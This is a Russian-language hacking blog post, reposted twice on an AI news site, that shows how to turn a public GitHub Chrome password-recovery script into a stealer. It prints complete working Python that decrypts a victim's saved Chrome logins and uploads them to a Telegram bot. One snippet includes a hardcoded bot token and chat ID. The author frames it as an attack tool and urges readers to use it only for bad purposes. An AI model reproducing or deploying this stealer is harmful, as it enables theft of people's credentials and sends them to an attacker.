GitHub - Твой проводник в мир вирусологии.

2019-10-16 15:15

Привет, хацкер, сегодня я расскажу тебе о том, как GitHub помогает хакерам в вирусных атаках…

Приведу пример, когда хакеры брали готовые инструменты с GitHub'a и проводили атаки:

Для некоторых целей атаки были полностью “безфайловые”, в итоге доставлявшие Meterpreter-сессию непосредственно в память. В других случаях использовался инструмент для хищения паролей LaZagne Project или загружалась и выполнялась другая Python-малварь. После проведения дополнительного расследования мы идентифицировали контроллеры для разных протоколов, в том числе Cmd, Lazagne, Mimikatz и так далее», — объясняют эксперты Morphisec.

Полный отчёт о таких роде атак можно найти на xakep'e

Так в чём суть?

Хакеры использовали готовые инструменты для атаки, все они были в публичном доступе. Сегодня я приведу в пример, как они сделали из публичного инструмента, предназначенного для восстановления паролей, вирус который отправляет данные злоумышленнику.

Поехали!

В поиске GitHub'a нашёл этот репозиторий:

Когда вы запрашиваете Google Chrome для сохранения пароля на данном веб-сайте, он сохраняет его в файле "Login Data" (файл базы данных sqlite).

Для безопасного хранения пароля пароль шифруется с использованием учетных данных окна пользователя.

Эта программа расшифровывает пароли в машине пользователя, а затем копирует их в тот же каталог, в котором присутствует программа.

Поэтому, если исполняемая версия этой программы подключена к любому компьютеру под управлением windows и Google Chrome, запуск этой программы скопирует все сохраненные пароли Chrome в текстовый файл. ( Admin: Кодер реализовал функцию сохранения паролей криво, но мы это поправим:) )

Скачиваем архив, смотрим код:

Исходя из кода, можем выявить работу этой утилиты.

Сначала проводится подключение к бд Login Data (он содержит пароли)
Далее в колонке logins он выбирает и извлекает таблицы: action_url, username_value, password_value
Затем создаёт файл с именем file.txt и записывает в него логины и пароли

Тут всё просто, как 2х2.

Запустим скрипт иии…

Пароли не сохранились... Видимо кодер не проверял свой код, но ничего, сейчас всё подправим.

Всё дело в том, что пароли то он записал, а соединение с файлом закрыть забыл, лечится эта ошибка одной строкой:

fp.close()

Запускаем иии…

Скрипт работает, но наш кодер сделал лог максимально неудобным

Ладно, и эту ошибку мы поправим, для этого просто в некоторых местах убираем '/n' (она отвечает за начало новой строки)

Теперь лог приобрёл человеческий вид :)

fp.write(' The website: '+ result[0] + ' ') fp.write('The Username: '+ result[1] + ' ')  fp.write('The password: '+ str(password) + ' ')

Лог сохранён, приведён в порядок, можно и отправить (не будем же мы лично запускать стиллер на ПК жертвы, а потом копировать текстовик на USB?))

Отправка будет моим любимым способом - в телеграм.

Для этого нам нужно:

Импортировать библиотеку requests, для POST запроса (для отправки)
Добавить две переменные отвечающие за токен бота, и ID чата.
Объявить переменную для POST запроса
Ну и сделать запрос

# Переменные chat_id = '439184350' bot_token = '707234715:AAG7I_RBjNt93HWlXAmWML0LwkRGxqNq8Ac'  # Переменная для POST запроса files = {'document': open('file.txt', 'rb')}  # Сам запрос requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id  + "&caption=NEW LOG! ?" + " Coded by @DARKSIDE_TEAM", files=files)

Теперь код выглядит так:

Ну и протестируем:

Весь код:

import sqlite3 import win32crypt import os import requests from os import getenv  chat_id = '' bot_token = ''  conn = sqlite3.connect(getenv("APPDATA")+r"..LocalGoogleChromeUser DataDefaultLogin Data") cursor = conn.cursor()  cursor.execute('Select action_url, username_value, password_value FROM logins') fp = open(r"file.txt", "a+") fp.write("Chrome Saved Passwords | Dark $ide - @darkside_team ") for result in cursor.fetchall():    password = win32crypt.CryptUnprotectData(result[2],None,None,None,0)[1]    if password:        fp.write(' The website: '+result[0] + ' ')        fp.write('The Username: '+result[1] + ' ')         fp.write('The password: '+ str(password) + ' ')   fp.close()  files = {'document': open('file.txt', 'rb')}  requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id + "&caption=NEW LOG! ?" + " Coded by @DARKSIDE_TEAM", files=files)  ''' DARK $IDE | @DARKSIDE_TEAM '''

Использовать исключительно в плохих целях!

Заключение.

Сегодня мы рассмотрели способ, который позволяет сделать из программы показывающей пароли, сделать стиллер с отправкой лога в телегу. На этом статья подходит к концу, удачи тебе, хацкер

Источник: m.vk.com



		GitHub - Твой проводник в мир вирусологии.
МЕНЮ Искусственный интеллект Поиск Регистрация на сайте Помощь проекту ТЕМЫ Новости ИИ Искусственный интеллект Голосовой помощник Городские сумасшедшие ИИ в медицине ИИ проекты Искусственные нейросети Слежка за людьми Угроза ИИ Разработка ИИ ИИ теория Компьютерные науки Машинное обуч. (Ошибки) Машинное обучение Машинный перевод Реализация ИИ Реализация нейросетей Создание беспилотных авто Трезво про ИИ Философия ИИ Внедрение ИИ Big data Генетические алгоритмы Капсульные нейросети Основы нейронных сетей Распознавание лиц Распознавание образов Распознавание речи Техническое зрение Чат-боты Работа разума и сознание Изучение сна Изучение сознания Психология Работа головного мозга Работа памяти Работа разума Модель мозга Модель мозга Робототехника, БПЛА Беспилотные автомобили БПЛА Робототехника Трансгуманизм Трансгуманизм Обработка текста Анализ социальных сетей Компьютерная лингвистика Лингвистика Поисковые алгоритмы Теория эволюции Головной мозг Нейронные сети Поведение животных Теория эволюции Дополненная реальность Виртулаьная реальность Дополненная реальность Железо Интернет вещей Квантовые компьютеры Нейронные процессоры облачные вычисления Суперкомпьютеры Киберугрозы Кибербезопасность Научный мир Методы исследования Наука и образование Семинары ИТ индустрия ИТ-гиганты Новости ит Разработка ПО Разработка ПО Теория алгоритмов Теория информации Кластеризация Математика Актуальная математика Статистика Теория вероятности Теория информации Теория хаоса Цифровая экономика Технология блокчейн Цифровая экономика Авторизация RSS RSS новости		2019-10-16 15:15 разработка по, кибербезопасность Привет, хацкер, сегодня я расскажу тебе о том, как GitHub помогает хакерам в вирусных атаках… Приведу пример, когда хакеры брали готовые инструменты с GitHub'a и проводили атаки: Для некоторых целей атаки были полностью “безфайловые”, в итоге доставлявшие Meterpreter-сессию непосредственно в память. В других случаях использовался инструмент для хищения паролей LaZagne Project или загружалась и выполнялась другая Python-малварь. После проведения дополнительного расследования мы идентифицировали контроллеры для разных протоколов, в том числе Cmd, Lazagne, Mimikatz и так далее», — объясняют эксперты Morphisec. Полный отчёт о таких роде атак можно найти на xakep'e Так в чём суть? Хакеры использовали готовые инструменты для атаки, все они были в публичном доступе. Сегодня я приведу в пример, как они сделали из публичного инструмента, предназначенного для восстановления паролей, вирус который отправляет данные злоумышленнику. Поехали! В поиске GitHub'a нашёл этот репозиторий: Когда вы запрашиваете Google Chrome для сохранения пароля на данном веб-сайте, он сохраняет его в файле "Login Data" (файл базы данных sqlite). Для безопасного хранения пароля пароль шифруется с использованием учетных данных окна пользователя. Эта программа расшифровывает пароли в машине пользователя, а затем копирует их в тот же каталог, в котором присутствует программа. Поэтому, если исполняемая версия этой программы подключена к любому компьютеру под управлением windows и Google Chrome, запуск этой программы скопирует все сохраненные пароли Chrome в текстовый файл. ( Admin: Кодер реализовал функцию сохранения паролей криво, но мы это поправим:) ) Скачиваем архив, смотрим код: Исходя из кода, можем выявить работу этой утилиты. Сначала проводится подключение к бд Login Data (он содержит пароли) Далее в колонке logins он выбирает и извлекает таблицы: action_url, username_value, password_value Затем создаёт файл с именем file.txt и записывает в него логины и пароли Тут всё просто, как 2х2. Запустим скрипт иии… Пароли не сохранились... Видимо кодер не проверял свой код, но ничего, сейчас всё подправим. Всё дело в том, что пароли то он записал, а соединение с файлом закрыть забыл, лечится эта ошибка одной строкой: fp.close() Запускаем иии… Скрипт работает, но наш кодер сделал лог максимально неудобным Ладно, и эту ошибку мы поправим, для этого просто в некоторых местах убираем '/n' (она отвечает за начало новой строки) Теперь лог приобрёл человеческий вид :) fp.write(' The website: '+ result[0] + ' ') fp.write('The Username: '+ result[1] + ' ') fp.write('The password: '+ str(password) + ' ') Лог сохранён, приведён в порядок, можно и отправить (не будем же мы лично запускать стиллер на ПК жертвы, а потом копировать текстовик на USB?)) Отправка будет моим любимым способом - в телеграм. Для этого нам нужно: Импортировать библиотеку requests, для POST запроса (для отправки) Добавить две переменные отвечающие за токен бота, и ID чата. Объявить переменную для POST запроса Ну и сделать запрос # Переменные chat_id = '439184350' bot_token = '707234715:AAG7I_RBjNt93HWlXAmWML0LwkRGxqNq8Ac' # Переменная для POST запроса files = {'document': open('file.txt', 'rb')} # Сам запрос requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id + "&caption=NEW LOG! ?" + " Coded by @DARKSIDE_TEAM", files=files) Теперь код выглядит так: Ну и протестируем: Весь код: import sqlite3 import win32crypt import os import requests from os import getenv chat_id = '' bot_token = '' conn = sqlite3.connect(getenv("APPDATA")+r"..LocalGoogleChromeUser DataDefaultLogin Data") cursor = conn.cursor() cursor.execute('Select action_url, username_value, password_value FROM logins') fp = open(r"file.txt", "a+") fp.write("Chrome Saved Passwords \| Dark $ide - @darkside_team ") for result in cursor.fetchall(): password = win32crypt.CryptUnprotectData(result[2],None,None,None,0)[1] if password: fp.write(' The website: '+result[0] + ' ') fp.write('The Username: '+result[1] + ' ') fp.write('The password: '+ str(password) + ' ') fp.close() files = {'document': open('file.txt', 'rb')} requests.post("https://api.telegram.org/bot" + bot_token + "/sendDocument?chat_id=" + chat_id + "&caption=NEW LOG! ?" + " Coded by @DARKSIDE_TEAM", files=files) ''' DARK $IDE \| @DARKSIDE_TEAM ''' Использовать исключительно в плохих целях! Заключение. Сегодня мы рассмотрели способ, который позволяет сделать из программы показывающей пароли, сделать стиллер с отправкой лога в телегу. На этом статья подходит к концу, удачи тебе, хацкер Источник: m.vk.com Комментарии:

GitHub - Твой проводник в мир вирусологии.

Комментарии: